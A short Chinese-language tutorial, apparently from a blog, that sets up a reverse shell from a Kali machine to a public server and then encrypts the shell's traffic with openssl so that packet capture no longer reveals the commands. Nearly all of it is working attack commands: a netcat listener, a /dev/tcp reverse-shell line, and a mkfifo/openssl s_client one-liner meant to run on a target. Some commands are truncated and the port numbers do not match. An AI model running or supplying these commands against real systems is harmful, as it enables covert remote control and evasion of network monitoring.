环境说明
- 公网服务器一台
- kali (内网)
简单的测试
在公网服务器执行命令
代码语言:javascript复制 nc -lvvp 4444kali中执行命令
代码语言:javascript复制 -i >& /dev/tcp/公网ip/5555 0>&1启动Wireshark开启抓包,分析流量。
测试
我们在终端中随便输入一条命令ifconfig,然后到Wireshark中查看。
openssl加密传输
第一步,在vps上生成SSL证书的公钥/私钥对
代码语言:javascript复制openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes第二步,在VPS监听反弹shell
代码语言:javascript复制openssl s_server -quiet -key key.pem -cert cert.pem -port 4433第三步,在目标上用openssl加密反弹shell的流量
代码语言:javascript复制mkfifo /tmp/s;/bin/ -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s流量已经被加密。
